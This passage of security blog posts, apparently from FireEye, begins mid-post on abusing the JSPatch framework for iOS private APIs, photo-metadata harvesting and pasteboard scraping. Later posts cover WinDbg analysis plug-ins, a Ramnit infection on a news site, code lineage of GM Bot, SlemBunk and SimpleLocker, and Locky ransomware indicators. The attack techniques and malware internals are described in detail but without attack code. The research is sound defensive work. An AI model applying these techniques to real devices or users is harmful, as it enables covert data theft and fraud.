Consider a target app that is built with the public framework CoreTelephony.framework. Apple documentation explains that this framework allows one to obtain information about a user’s home cellular service provider. It exposes several public APIs to developers to achieve this, but [CTTelephonyNetworkInfo updateRadioAccessTechnology:] is not one of them. However, as shown in Figure 13 and Figure 14, we can successfully use this private API to update the device cellular service status by changing the radio technology from CTRadioAccessTechnologyHSDPA to CTRadioAccessTechnologyLTE without Apple’s consent.

Figure 13. JavaScript code that changes the Radio Access Technology of the test device

 

Figure 14. Corresponding execution output of the above JavaScript code via Private API

Example 4: Access to Photo Album (sensitive data) via public APIs

a.     Example loaded framework: /System/Library/Frameworks/Photos.framework
b.     Public APIs: [PHAsset fetchAssetsWithMediaType:options:]

Privacy violations are a major concern for mobile users. Any actions performed on a device that involve accessing and using sensitive user data (including contacts, text messages, photos, videos, notes, call logs, and so on) should be justified within the context of the service provided by the app. However, Figure 15 and Figure 16 show how we can access the user’s photo album by leveraging the public APIs from the built-in Photos.framework to harvest the metadata of photos. With a bit more code, one can export this image data to a remote location without the user’s knowledge.

Figure 15. JavaScript code that accesses the Photo Library

 

Figure 16. Corresponding output of the above JavaScript in Figure 15

Example 5: Access to Pasteboard in real time

a.     Example Framework: /System/Library/Frameworks/UIKit.framework
b.     APIs: [UIPasteboard strings], [UIPasteboard items], [UIPasteboard string]

iOS pasteboard is one of the mechanisms that allows a user to transfer data between apps. Some security researchers have raised concerns regarding its security, since pasteboard can be used to transfer sensitive data such as accounts and credentials. Figure 17 shows a simple demo function in JavaScript that, when running on the JSPatch framework, scrapes all the string contents off the pasteboard and displays them on the console. Figure 18 shows the output when this function is injected into the target application on a device.

Figure 17. JavaScript code that scrapes the pasteboard, which might contain sensitive information

 

Figure 18. Console output of the scraped content from pasteboard by code in Figure 17

We have shown five examples utilizing JSPatch as an attack vector, and the potential for more is only constrained by an attacker’s imagination and creativity.

Future Attacks

Much of iOS’ native capability is dependent on C functions (for example, dlopen(), UIGetScreenImage()). Because C functions cannot be reflectively invoked, JSPatch does not support a direct C-to-JavaScript mapping. In order to use C functions in JavaScript, an app must implement JSExtension, which packs the C function into corresponding interfaces that are further exported to JavaScript.

This dependency on additional Objective-C code to expose C functions places limits on a malicious actor’s ability to perform operations such as taking stealth screenshots, sending and intercepting text messages without consent, stealing photos from the gallery, or stealthily recording audio. But these limitations can easily be lifted should an app developer choose to add a bit more Objective-C code to wrap and expose these C functions. In fact, the JSPatch author could offer such support to app developers in the near future through more usable and convenient interfaces, provided there is enough demand. In this case, all of the above operations could become reality without Apple’s consent.

Security Impact

It is a general belief that iOS devices are more secure than mobile devices running other operating systems; however, one has to bear in mind that the elements contributing to this status quo are multi-faceted. The core of Apple’s security controls to provide and maintain a secure ecosystem for iOS users and developers is their walled garden – the App Store. Apps distributed through the App Store are significantly more difficult to leverage in meaningful attacks. To this day, two main attack vectors make up all previously disclosed attacks against the iOS platform:

1.     Jailbroken iOS devices that allow unsigned or ill-signed apps to be installed due to the disabled signature checking function. In some cases, the sandbox restrictions are lifted, which allows apps to function outside of the sandbox.

2.     App sideloading via Enterprise Certifications on non-jailbroken devices. FireEye published a series of reports that detailed attacks exploiting this attack surface, and recent reports show a continued focus on this known attack vector.

However, as we have highlighted in this report, JSPatch offers an attack vector that does not require sideloading or a jailbroken device for an attack to succeed. It is not difficult to identify that the JavaScript content, which is not subject to any review process, is a potential Achilles heel in this app development architecture. Since there are few to zero security measures to ensure the security properties of this file, the following scenarios for attacking the app and the user are conceivable:

●      Precondition: 1) App embeds JSPatch platform; 2) App Developer has malicious intentions.

○      Consequences: The app developer can utilize all the Private APIs provided by the loaded frameworks to perform actions that are not advertised to Apple or the users. Since the developer has control of the JavaScript code, the malicious behavior can be temporary, dynamic, stealthy, and evasive. Such an attack, when in place, will pose a big risk to all stakeholders involved.

○      Figure 19 demonstrates a scenario of this type of attack:

Figure 19. Threat model for JSPatch used by a malicious app developer

●      Precondition: 1) Third-party ad SDK embeds JSPatch platform; 2) Host app uses the ad SDK; 3) Ad SDK provider has malicious intention against the host app.

○      Consequences: 1) Ad SDK can exfiltrate data from the app sandbox; 2) Ad SDK can change the behavior of the host app; 3) Ad SDK can perform actions on behalf of the host app against the OS.

○      This attack scenario is shown in Figure 20:

Figure 20. Threat model for JSPatch used by a third-party library provider

The FireEye discovery of iBackdoor in 2015 is an alarming example of displaced trust within the iOS development community, and serves as a sneak peek into this type of overlooked threat.

●      Precondition: 1) App embeds JSPatch platform; 2) App Developer is legitimate; 3) App does not protect the communication from the client to the server for JavaScript content; 4) A malicious actor performs a man-in-the-middle (MITM) attack that tampers with the JavaScript content.

○      Consequences: MITM can exfiltrate app contents within the sandbox; MITM can perform actions through Private API by leveraging host app as a proxy.

○      This attack scenario is shown in Figure 21:

           Figure 21. Threat model for JSPatch used by an app targeted by MITM

Field Survey

JSPatch originated in China. Since its release in 2015, it has seen wide adoption within the Chinese market. According to JSPatch, many popular and high-profile Chinese apps have adopted this technology. FireEye app scanning found a total of 1,220 apps in the App Store that utilize JSPatch.

We also found that developers outside of China have adopted this framework. On one hand, this indicates that JSPatch is a useful and desirable technology in the iOS development world. On the other hand, it signals that users are at greater risk of being attacked – particularly if precautions are not taken to ensure the security of all parties involved. Despite the risks posed by JSPatch, FireEye has not identified any of the aforementioned applications as being malicious.  

Food For Thought

Many applaud Apple’s App Store for helping to keep iOS malware at bay. While it is undeniably true that the App Store plays a critical role in winning this acclaim, it is at the cost of app developers’ time and resources.

One of the manifestations of such a cost is the app hot patching process, where a simple bug fix has to go through an app review process that subjects the developers to an average waiting time of seven days before updated code is approved. Thus, it is not surprising to see developers seeking various solutions that attempt to bypass this wait period, but which lead to unintended security risks that may catch Apple off guard.

JSPatch is one of several different offerings that provide a low-cost and streamlined patching process for iOS developers. All of these offerings expose a similar attack vector that allows patching scripts to alter the app behavior at runtime, without the constraints imposed by the App Store’s vetting process. Our demonstration of abusing JSPatch capabilities for malicious gain, as well as our presentation of different attack scenarios, highlights an urgent problem and an imperative need for a better solution – notably due to a growing number of app developers in China and beyond having adopted JSPatch.

Many developers have doubts that the App Store would accept technologies leveraging scripts such as JavaScript. According to Apple’s App Store Review Guidelines, apps that download code in any way or form will be rejected. However, the JSPatch community argues it is in compliance with Apple’s iOS Developer Program Information, which makes an exception to scripts and code downloaded and run by Apple's built-in WebKit framework or JavascriptCore, provided that such scripts and code do not change the primary purpose of the application by providing features or functionality that are inconsistent with the intended and advertised purpose of the application as submitted to the App Store.

The use of malicious JavaScript (which presumably changes the primary purpose of the application) is clearly prohibited by the App Store policy. JSPatch is walking a fine line, but it is not alone. In our coming reports, we intend to examine other hot patching offerings in a similar way, in search of a solution that satisfies Apple and the developer community without jeopardizing users’ security. Stay tuned!

 

[1] We have contacted the app provider regarding the issue. In order to protect the app vendor and its users, we have chosen not to disclose its identity until the issue has been addressed.
[2] The redacted part is the hardcoded decryption key.

 

FLARE Script Series: flare-dbg Plug-ins

9 February 2016 at 12:00

Introduction

This post continues the FireEye Labs Advanced Reverse Engineering (FLARE) script series. In this post, we continue to discuss the flare-dbg project. If you haven’t read my first post on using flare-dbg to automate string decoding, be sure to check it out!

We created the flare-dbg Python project to support the creation of plug-ins for WinDbg. When we harness the power of WinDbg during malware analysis, we gain insight into runtime behavior of executables. flare-dbg makes this process particularly easy. This blog post discusses WinDbg plug-ins that were inspired by features from other debuggers and analysis tools. The plug-ins focus on collecting runtime information and interacting with malware during execution. Today, we are introducing three flare-dbg plug-ins, which are summarized in Table 1.

Table 1: flare-dbg plug-in summary

To demonstrate the functionality of these plug-ins, this post uses a banking trojan (MD5: 03BA3D3CEAE5F11817974C7E4BE05BDE) known to FireEye as TINBA.

injectfind

Background

A common technique used by malware is code injection. When malware allocates a memory region to inject code, the created region exhibits certain characteristics that we can use to identify it in a process’s memory space. The injectfind plug-in finds and displays information about injected memory regions from within WinDbg.

The injectfind plug-in is loosely based on the Volatility malfind plug-in. Given a memory dump, malfind searches process memory for injected code and presents its findings to the analyst. Instead of requiring a memory dump, the injectfind WinDbg plug-in runs in a debugger. Similar to malfind, the injectfind plug-in identifies memory regions that may have had code injected and prints a hex dump and a disassembly listing of each identified region. A quick glance at the output helps us identify injected code or hooked functions. The following section shows an example of an analyst identifying injected code with injectfind.
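For analysts who want to experiment with the underlying heuristic outside of the debugger, the core check can be sketched in a few lines of stand-alone Python. This is an illustration of the malfind-style heuristic only, not flare-dbg’s actual code; the process handle is assumed to come from OpenProcess with query rights.

    import ctypes
    from ctypes import wintypes

    MEM_COMMIT = 0x1000
    MEM_PRIVATE = 0x20000
    PAGE_EXECUTE_READWRITE = 0x40

    class MEMORY_BASIC_INFORMATION(ctypes.Structure):
        _fields_ = [("BaseAddress", ctypes.c_void_p),
                    ("AllocationBase", ctypes.c_void_p),
                    ("AllocationProtect", wintypes.DWORD),
                    ("RegionSize", ctypes.c_size_t),
                    ("State", wintypes.DWORD),
                    ("Protect", wintypes.DWORD),
                    ("Type", wintypes.DWORD)]

    def suspicious_regions(hprocess):
        """Yield (base, size) of committed, private, RWX regions -- a classic
        marker of injected code."""
        kernel32 = ctypes.windll.kernel32
        mbi = MEMORY_BASIC_INFORMATION()
        address = 0
        while kernel32.VirtualQueryEx(hprocess, ctypes.c_void_p(address),
                                      ctypes.byref(mbi), ctypes.sizeof(mbi)):
            if (mbi.State == MEM_COMMIT and mbi.Type == MEM_PRIVATE
                    and mbi.Protect == PAGE_EXECUTE_READWRITE):
                yield mbi.BaseAddress, mbi.RegionSize
            address = (mbi.BaseAddress or 0) + mbi.RegionSize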

Example

After running the TINBA malware in an analysis environment, we observe that the initial loader process exits immediately, and the explorer.exe process begins making network requests to seemingly random domains. After attaching to the explorer.exe process with WinDbg and running the injectfind plug-in, we see the output shown in Figure 1.

Figure 1: Output from the injectfind plug-in

The first memory region at virtual address 0x1700000 appears to contain references to Windows library functions and is 0x17000 bytes in size. It is likely that this memory region contains the primary payload of the TINBA malware.

The second memory region at virtual address 0x1CD0000 contains a single page, 0x1000 bytes in length, and appears to have two lines of meaningful disassembly. The disassembly shows the eax register being set to 0x30 and a jump five bytes into the NtCreateProcessEx function. Figure 2 shows the disassembly of the first few instructions of the NtCreateProcessEx function.

Figure 2: NtCreateProcessEx disassembly listing

The first instruction for NtCreateProcessEx is a jmp to an address outside of ntdll's memory. The destination address is within the first memory region that injectfind identified as injected code. We can quickly conclude, all from within a WinDbg debugger session, that the malware hooks the process creation function.

membreak

Background

One feature missing from WinDbg that is present in OllyDbg and x64dbg is the ability to set a breakpoint on an entire memory region. This type of breakpoint is known as a memory breakpoint. Memory breakpoints are used to pause a process when a specified region of memory is executed.

Memory breakpoints are useful when you want to break on code execution without specifying a single address. For example, many packers unpack their code into a new memory region and begin executing somewhere in this new memory. Setting a memory breakpoint on the new memory region would pause the debugger at the first execution anywhere within the new memory region. This obviates the need to tediously reverse engineer the unpacking stub to identify the original entry point.

One way to implement memory breakpoints is by changing the memory protection for a memory region by adding the PAGE_GUARD memory protection flag. When this memory region is executed, a STATUS_GUARD_PAGE_VIOLATION exception occurs. The debugger handles the exception and returns control to the user. The flare-dbg plug-in membreak uses this technique to implement memory breakpoints.
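As a rough stand-alone illustration of that mechanism (not the membreak plug-in’s actual code), the Python sketch below adds PAGE_GUARD to an entire region in a target process; the next access to any page in the region raises STATUS_GUARD_PAGE_VIOLATION, which an attached debugger can trap before restoring the original protection.

    import ctypes
    from ctypes import wintypes

    PAGE_GUARD = 0x100

    def set_memory_breakpoint(hprocess, base, size, current_protect):
        """Re-protect a whole region with PAGE_GUARD added and return the
        original protection so it can be restored once the breakpoint hits."""
        kernel32 = ctypes.windll.kernel32
        old_protect = wintypes.DWORD(0)
        ok = kernel32.VirtualProtectEx(hprocess,
                                       ctypes.c_void_p(base),
                                       ctypes.c_size_t(size),
                                       current_protect | PAGE_GUARD,
                                       ctypes.byref(old_protect))
        if not ok:
            raise ctypes.WinError()
        return old_protect.value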

Example

After locating the injected code using the injectfind plug-in, we set a memory breakpoint to pause execution within the injected code memory region. The membreak plug-in accepts one or multiple addresses as parameters. The plug-in takes each address, finds the base address for the corresponding memory region, and changes the entire region’s permissions. As shown in Figure 3, when the membreak plug-in is run with the base address of the injected code as the parameter, the debugger immediately resumes execution and runs until one of these memory regions is executed.

Figure 3: membreak plug-in run in WinDbg

The output for the memory breakpoint hit shows a Guard page violation and a message about first chance exceptions. As explained above, this should be expected. Once the breakpoint is hit, the membreak plug-in restores the original page permissions and returns control to the analyst.

importfind

Background

Malware often loads Windows library functions at runtime and stores the resolved addresses as global variables. Sometimes it is trivial to resolve these statically in IDA Pro, but other times this can be a tedious process. To speed up the labeling of these runtime imported functions, we created a plug-in named importfind to find these function addresses. Behind the scenes, the plug-in parses each library's export table and finds all exported function addresses. The plug-in then searches the malware’s memory and identifies references to the library function addresses. Finally, it generates an IDAPython script that can be used to annotate an IDB workspace with the resolved library function names.
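The general idea can be sketched with the third-party pefile module. This is a simplified illustration of the approach, not the plug-in’s code; it assumes a 32-bit sample, a copy of the malware’s memory in memory_blob, and a known load address for the library.

    import struct
    import pefile  # third-party: pip install pefile

    def resolve_runtime_imports(dll_path, dll_base, memory_blob, blob_base):
        """Map addresses inside a memory blob to exported function names by
        matching aligned 32-bit pointers against the DLL's export table."""
        pe = pefile.PE(dll_path)
        exports = {dll_base + sym.address: sym.name.decode()
                   for sym in pe.DIRECTORY_ENTRY_EXPORT.symbols if sym.name}
        renames = {}
        for offset in range(0, len(memory_blob) - 3, 4):
            pointer = struct.unpack_from("<I", memory_blob, offset)[0]
            if pointer in exports:
                renames[blob_base + offset] = exports[pointer]
        return renames  # e.g. emit idc.set_name(addr, name) lines for IDA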

Example

Going back to TINBA, we saw text referencing Windows library functions in the output from injectfind above. The screenshot of IDA Pro in Figure 4 shows this same region of data. Note that following each ASCII string containing an API name, there is a number that looks like a pointer. Unfortunately, IDA Pro does not have the same insight as the debugger, so these addresses are not resolved to API functions and named.

Figure 4: Unnamed library function addresses

We use the importfind plug-in to find the function names associated with these addresses, as shown in Figure 5.

Figure 5: importfind plug-in run in WinDbg

The importfind plug-in generates an IDAPython script file that is used to rename the global variables from Figure 4 in our IDB. Figure 6 shows a screenshot from IDA Pro after the script has renamed the global variables to more meaningful names.

Figure 6: IDA Pro with named global variables

Conclusion

This blog post shows the power of using the flare-dbg plug-ins with a debugger to gain insight into how the malware operates at runtime. We saw how to identify injected code using the injectfind plug-in and create memory breakpoints using membreak. We also demonstrated the usefulness of the importfind plug-in for identifying and renaming runtime imported functions.

To find out how to set up and get started with flare-dbg, head over to the GitHub project page, where you’ll learn about setup and usage.

Maimed Ramnit Still Lurking in the Shadow

18 February 2016 at 17:00

Newspapers have the ability to do more than simply keep us current with worldly affairs; we can use them to squash bugs! Yet, as we move from waiting on the newspaper delivery boy to reading breaking news on ePapers, we lose the subtle art of bug squashing. Instead, we end up exposing ourselves to dangerous digital bugs that can affect our virtual worlds.

This is exactly what happened to visitors of one of the top five news sites of China. Any users running Internet Explorer (IE) who navigated to the website may have been exposed to an old, yet persistent VBScript worm that has the ability to self-replicate recursively from infected machines. Incidentally, the major actors involved with this old campaign have been taken down, yet traces of their injected recursive malware have still managed to sneak onto one of the most visited sites in China.

The FireEye Dynamic Threat Intelligence (DTI) first discovered that the site was compromised and used to host VBS/Ramnit on Jan. 28, 2016. We can confirm that the infection is still live as of the time of this writing. IE users who visit the site may be compromised if they browse to a specific page (paperindex[.]htm) and click ‘Yes’ to run ActiveX, which may appear to be safe since the website is familiar and popular. There is no exploit used for infection, simply social engineering and errant clicks.

As shown in Figure 1, a malicious VBScript is appended after the HTML body. Upon landing on this page, the victim’s browser will load the news content while it executes a malicious ActiveX component in the background.

Figure 1: Legitimate HTML page appended with malicious VBScript

As shown in Figure 2 and Figure 3, the VBScript drops a binary named “svchost.exe” in the %TEMP% folder and executes it upon successful ActiveX execution. Once the system is compromised, the malware also tries to connect to a CnC server, fget-career[.]com, which has been involved in campaigns for this trojan before.

Figure 2: The VBScript drops the binary in the %TEMP% folder and executes it

Figure 3: The full path to “svchost.exe” (using Internet Explorer 11 on Windows 7)

Successful execution of the VBScript and delivery of W32.Ramnit onto the victim’s machine depend on the user’s browser, as well as the browser’s settings. Since Chrome and Firefox do not support client-side VBScript, only IE users are susceptible to this attack.

Fortunately, recent versions of IE do not run code automatically by default. Instead, users will see two popup warnings when the browser is rendering potentially dangerous objects such as ActiveX components, as shown in Figure 4 and Figure 5.

Figure 4: First warning for blocked content in IE 11

Figure 5: Second warning for blocked content in IE 11

Only when the victim clicks on “Yes” will the browser execute the blocked content. In this case, IE executes the VBScript, drops the payload, and runs it in the background while the user simply sees the usual news page.

As long as users click “No” to disallow ActiveX components, they will remain safe from W32.Ramnit. However, this type of social engineering continues to be successful. When a legitimate site is compromised to host exploits or malware, the positive reputation of the site is leveraged to trick users into clicking “Yes” and becoming infected. The potential impact of this particular threat is compounded by the fact that the compromised site is ranked in the Alexa Top 100 for most visited sites internationally, and is in the Top 25 for most popular websites in China [1].

FireEye appliances detect this infection at multiple levels. FireEye’s multiflow detection traces out the complete attack chain, as well as CnC communication. While the CnC host has been suspended for a long time, the worm’s presence alone can be a pain for the victim because it adds itself into all HTML files that it can access. Additionally, it adds itself to the startup registry and impacts the machine’s performance.

So the question that you need to ask yourself is this: If a Top 100 Alexa domain is still infected by this veteran malware, are you?

A Growing Number of Android Malware Families Believed to Have a Common Origin: A Study Based on Binary Code

By: Wu Zhou
11 March 2016 at 15:04

Introduction

On Feb. 19, IBM XForce researchers released an intelligence report [1] stating that the source code for GM Bot was leaked to a crimeware forum in December 2015. GM Bot is a sophisticated Android malware family that emerged in the Russian-speaking cybercrime underground in late 2014. IBM also claimed that several Android malware families recently described in the security community were actually variants of GM Bot, including Bankosy[2], MazarBot[3], and the SlemBunk malware recently described by FireEye[4, 5].

Security vendors may differ in their definition of a malware “variant.” The term may refer to anything from almost identical code with slight modifications, to code that has superficial similarities (such as similar network traffic) yet is otherwise very different.

Using IBM’s reporting, we compared their GM Bot samples to SlemBunk. Based on the disassembled code of these two families, we agree that there are enough code similarities to indicate that GM Bot shares a common origin with SlemBunk. Interestingly, our research led us to identify an earlier malware family named SimpleLocker – the first known file-encryption ransomware on Android [6] – that also shares a common origin with these banking trojan families.

GM Bot and SlemBunk

Our analysis showed that the four GM Bot samples referenced by IBM researchers all share the same major components as SlemBunk. Figure 1 of our earlier report [4] is reproduced here, which shows the major components of SlemBunk and its corresponding class names:

  • ServiceStarter: An Android receiver that will be invoked once an app is launched or the device boots up. Its functionality is to start the monitoring service, MainService, in the background.
  • MainService: An Android service that runs in the background and monitors all running processes on the device. It prompts the user with an overlay view that resembles the legitimate app when that app is launched. This monitoring service also communicates with a remote host by sending the initial device data and notifying of device status and app preferences.
  • MessageReceiver: An Android receiver that handles incoming text messages. In addition to the functionality of intercepting the authentication code from the bank, this component also acts as the bot client for remote command and control (C2).
  • MyDeviceAdminReceiver: A receiver that requests administrator access to the Android device the first time the app is launched. This makes the app more difficult to remove.
  • Customized UI views: Activity classes that present fake login pages that mimic those of the real banking apps or social apps to phish for banking or social account credentials.

Figure 1. Major components of SlemBunk malware family

The first three GM Bot samples have the same package name as our SlemBunk sample. In addition, the GM Bot samples have five of the same major components, including the same component names, as the SlemBunk sample in Figure 1.

The fourth GM Bot sample has a different initial package name, but unpacks the real payload at runtime. The unpacked payload has the same major components as the SlemBunk sample, with a few minor changes on the class names: MessageReceiver replaced with buziabuzia, and MyDeviceAdminReceiver replaced with MDRA.

Figure 2. Code Structure Comparison between GM Bot and SlemBunk

Figure 2 shows the code structure similarity between one GM Bot sample and one SlemBunk sample (SHA256 9425fca578661392f3b12e1f1d83b8307bfb94340ae797c2f121d365852a775e and SHA256 e072a7a8d8e5a562342121408493937ecdedf6f357b1687e6da257f40d0c6b27 for GM Bot and SlemBunk, respectively). From this figure, we can see that the five major components we discussed in our previous post [4] are also present in GM Bot sample. Other common classes include:

  • Main, the launching activity of both samples.
  • MyApplication, the application class that starts before any other activities of both samples.
  • SDCardServiceStarter, another receiver that monitors the status of MainService and restarts it when it dies.

Among all the above components and classes, MainService is the most critical one. It is started by class Main at the launching time, keeps working in the background to monitor the top running process, and overlays a phishing view when a victim app (e.g., some mobile banking app) is recognized. To keep MainService running continuously, malware authors added two receivers – ServiceStarter and SDCardServiceStarter – to check its status when particular system events are received. Both GM Bot and SlemBunk samples share the same architecture. Figure 3 shows the major code of class SDCardServiceStarter to demonstrate how GM Bot and SlemBunk use the same mechanism to keep MainService running.

Figure 3. Method onReceive of SDCardServiceStarter for GM Bot and SlemBunk

From this figure, we can see that GM Bot and SlemBunk use almost identical code to keep MainService running. Note that both samples check the country in the system locale and avoid starting MainService when they find the country is Russia. The only difference is that GM Bot applies renaming obfuscation to some classes, methods and fields. For example, static variable “MainService;->a” in GM Bot has the same role as static variable “MainService;->isRunning” in SlemBunk. Malware authors commonly use this trick to make their code harder to understand. However, this does not change the fact that the underlying code shares the same origin.

Figure 4 shows the core code of class MainService to demonstrate that GM Bot and SlemBunk actually have the same logic for main service. In Android, when a service is started its onCreate method will be called. In method onCreate of both samples, a static variable is first set to true. In GM Bot, this variable is named “a”, while in SlemBunk it is named “isRunning”. Then both will move forward to read an app particular preference. Note that the preferences in both samples have the same name: “AppPrefs”. The last tasks of these two main services are also the same. Specifically, in order to check whether any victim apps are running, a runnable thread is scheduled. If a victim app is running, a phishing view is overlaid on top of that of the victim app. The only difference here is also on the naming of the runnable thread. Class “d” in GM Bot and class “MainService$2” in SlemBunk are employed respectively to conduct the same credential phishing task.

Figure 4. Class MainService for GM Bot and SlemBunk

In summary, our investigation into the binary code similarities supports IBM’s assertion that GM Bot and SlemBunk share the same origin.

SimpleLocker and SlemBunk

IBM noted that GM Bot emerged in late 2014 in the Russian-speaking cybercrime underground. In our research, we noticed that an earlier piece of Android malware named SimpleLocker also has a code structure similar to SlemBunk and GM Bot. However, SimpleLocker has a different financial incentive: to demand a ransom from the victim. After landing on an Android device, SimpleLocker scans the device for certain file types, encrypts them, and then demands a ransom from the user in order to decrypt the files. Before SimpleLocker’s emergence, there were other types of Android ransomware that would lock the screen; however, SimpleLocker is believed to be the first file-encryption ransomware on Android.

The earliest report on SimpleLocker we identified was published by ESET in June 2014 [6]. However, we found an earlier sample in our malware database from May 2014 (SHA256 edff7bb1d351eafbe2b4af1242d11faf7262b87dfc619e977d2af482453b16cb). The compile date of this app was May 20, 2014. We compared this SimpleLocker sample to one of our SlemBunk samples (SHA256 f3341fc8d7248b3d4e58a3ee87e4e675b5f6fc37f28644a2c6ca9c4d11c92b96) using the same methods used to compare GM Bot and SlemBunk.

Figure 5 shows the code structure comparison between these two samples. Note that this SimpleLocker variant also has the major components ServiceStarter and MainService, both used by SlemBunk. However, the purpose of the main service here is not to monitor running apps and provide phishing UIs to steal banking credentials. Instead, SimpleLocker’s main service component scans the device for victim files and calls the file encryption class to encrypt files and demand a ransom. The major differences in the SimpleLocker code are shown in the red boxes: AesCrypt and FileEncryptor. Other common classes include:

  • Main, the launching activity of both samples.
  • SDCardServiceStarter, another receiver that monitors the status of MainService and restarts it when it dies.
  • Tor and OnionKit, third-party libraries for private communication.
  • TorSender, HttpSender and Utils, supporting classes to provide code for CnC communication and for collecting device information.

Figure 5. Code structure comparison between SimpleLocker and SlemBunk samples

Finally, we located another SimpleLocker sample (SHA256 304efc1f0b5b8c6c711c03a13d5d8b90755cec00cac1218a7a4a22b091ffb30b) from July 2014, about two months after the first SimpleLocker sample. This new sample did not use Tor for private communications, but shared four of the five major components with the SlemBunk sample (SHA256: f3341fc8d7248b3d4e58a3ee87e4e675b5f6fc37f28644a2c6ca9c4d11c92b96). Figure 6 shows the code structure comparison between these two samples.

Figure 6. Code structure comparison between SimpleLocker and SlemBunk variants

As we can see in Figure 6, the new SimpleLocker sample used a packaging mechanism similar to SlemBunk, putting HttpSender and Utils into a sub-package named “utils”. It also added two other major components that were originally only seen in SlemBunk: MessageReceiver and MyDeviceAdminReceiver. In total, this SimpleLocker variant shares four out of five major components with SlemBunk.

Figure 7 shows the major code of MessageReceiver in the previous samples to demonstrate that SimpleLocker and SlemBunk use basically the same process and logic to communicate with the CnC server. First, class MessageReceiver registers itself to handle incoming short messages, whose arrival will trigger its method onReceive. As seen from the figure, the main logics here are basically the same for SimpleLocker and SlemBunk. They first read the value of a particular key from app preferences. Note that the names for the key and shared preference are the same for these two different malware families: key is named “CHECKING_NUMBER_DONE” and preference named “AppPrefs”.  The following steps call method retrieveMessage to retrieve the short messages, and then forward the control flow to class SmsProcessor. The only difference here is that SimpleLocker adds one extra method named processControlCommand to forward control flow.

Class SmsProcessor defines the CnC commands supported by the malware families. Looking into class SmsProcessor, we identified more evidence that SimpleLocker and SlemBunk are of the same origin. First, the CnC commands supported by SimpleLocker are actually a subset of those supported by SlemBunk. In SimpleLocker, CnC commands include "intercept_sms_start", "intercept_sms_stop", "control_number" and "send_sms", all of which are also present in SlemBunk sample. What is more, in both SimpleLocker and SlemBunk there is a common prefix “#” before the actual CnC command. This kind of peculiarity is a good indicator that SimpleLocker and SlemBunk share a common origin.

Figure 7. Class MessageReceiver for SimpleLocker and SlemBunk variants

The task of class MyDeviceAdminReceiver is to request device administrator privilege, which makes these malware families harder to remove. SimpleLocker and SlemBunk are also highly similar in this respect, supporting the same set of device admin relevant functionalities.

At this point, we can see that these variants of SimpleLocker and SlemBunk share four out of five major components and share the same supporting utilities. The only difference is in the final payload, with SlemBunk phishing for banking credentials while SimpleLocker encrypts certain files and demands ransom. This leads us to believe that SimpleLocker came from the same original code base as SlemBunk.

Conclusion

Our analysis confirms that several Android malware families share a common origin, and that the first known file-encrypting ransomware for Android – SimpleLocker – is based on the same code as several banking trojans. Additional research may identify other related malware families.

Individual developers in the cybercrime underground have been proficient in writing and customizing malware. As we have shown, malware with specific and varied purposes can be built on a large base of shared code used for common functions such as gaining administrative privileges, starting and restarting services, and CnC communications. This is apparent simply from looking at known samples related to GM Bot – from SimpleLocker that is used for encryption and ransomware, to SlemBunk that is used as a banking Trojan and for credential theft, to the full-featured MazarBot backdoor.

With the leak of the GM Bot source code, the number of customized Android malware families based on this code will certainly increase. Binary code-based study, one of FireEye Labs’ major research tools, can help us better characterize and track malware families and their relationships, even without direct access to the source code. Fortunately, the similarities across these malware families make them easier to identify, ensuring that FireEye customers are well protected.

References:

[1]. Android Malware About to Get Worse: GM Bot Source Code Leaked
[2]. Android.Bankosy: All ears on voice call-based 2FA
[3]. MazarBOT: Top class Android datastealer
[4]. SLEMBUNK: AN EVOLVING ANDROID TROJAN FAMILY TARGETING USERS OF WORLDWIDE BANKING APPS
[5]. SLEMBUNK PART II: PROLONGED ATTACK CHAIN AND BETTER-ORGANIZED CAMPAIGN
[6]. ESET Analyzes Simplocker – First Android File-Encrypting, TOR-enabled Ransomware

 

Surge in Spam Campaign Delivering Locky Ransomware Downloaders

25 March 2016 at 12:00

FireEye Labs is detecting a significant spike in Locky ransomware downloaders due to a pair of concurrent email spam campaigns impacting users in over 50 countries. Some of the top affected countries are depicted in Figure 1.

Figure 1. Affected countries

As seen in Figure 2, the steep spike starts on March 21, 2016, when Locky began running campaigns that coincide with the new Dridex campaigns discussed in the blog “Stop Scanning My Macro”.

Figure 2. Detection on spam delivered malware

Prior to Locky’s emergence in February 2016, Dridex was responsible for a relatively higher volume of email spam campaigns. However, as shown in Figure 3, Locky is catching up with Dridex’s spam activity. This is especially true for this week, as we are seeing more Locky-related spam themes than Dridex-related ones. On top of that, we are also seeing Dridex and Locky running campaigns on the same day, which resulted in an abnormal detection spike.

Figure 3. Dridex versus Locky spam campaign over time

Locky Ransomware spam 

The new Locky spam campaign uses several themes, such as “invoice notice”, “attached image”, and “attached document”. See Figure 4 and Figure 5 for example campaign emails.

Figure 4. Urgent Invoice Campaign

Figure 5. Other Campaigns

The ZIP attachment as depicted in Figure 6 contains a malicious JavaScript downloader that downloads and installs the Locky ransomware.

Figure 6. Zipped Content

As shown in Figure 7, it is interesting to see that the recent Locky campaign seems to prefer a JavaScript-based downloader over the Microsoft Word and Excel macro-based downloaders used in its early days.

Figure 7. Locky Downloader Mechanism

The preference for JavaScript downloaders could be due to how easily the script can be transformed or obfuscated via automation to generate new variants, as depicted in Figure 8. As a result, traditional signature-based solutions may not keep up with the variants, even though their behavioral intent is the same. At the time of discovery, most of the samples we saw were being detected by only one vendor, according to VirusTotal.

Figure 8. Obfuscated JavaScript code

Conclusions

The observed volume of Locky ransomware downloaders is increasing, and Locky may replace the Dridex downloader as the top spam-delivered malware. One of the latest victims of Locky is Methodist Hospital[1], which was reportedly forced to pay a ransom to retrieve its encrypted data. This suggests that the cybercriminals are earning more from ransomware, which drives their aggressive campaigns.

On top of that, JavaScript downloaders seem to be the preferred medium for delivering the payload, as they can easily be obfuscated to create new variants.

Technical Analysis of a Locky Payload Sample

MD5 Sum: 3F118D0B888430AB9F58FC2589207988 (First seen on 2016-02-24 in VirusTotal)

Persistence Mechanism
  • The malware does not contain a persistence mechanism. An external tool or installer is required if the attacker desires persistence.
  • The malware contains the ability to install the following registry key for persistence; this functionality is disabled in this variant.
    • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Locky
      • <path_to_malware>
File System Artifacts
  • The malware encrypts files on the system and creates new files with the encrypted contents in the same directory with the following naming convention:
    • <system identifier><16 random hex digits>.locky
    • The <system identifier> value is the ASCII hexadecimal representation of the first eight bytes of the MD5 hash of the GUID of the system volume.
  • The malware drops a ransom note provided by the C2 server in all directories with encrypted files and on the desktop of the current user:
    • _Locky_recover_instructions.txt
  • The malware drops an image on the desktop of the current user:
    • _Locky_recover_instructions.bmp
Registry Artifacts
  • The malware creates the registry key HKCU\Software\Locky.
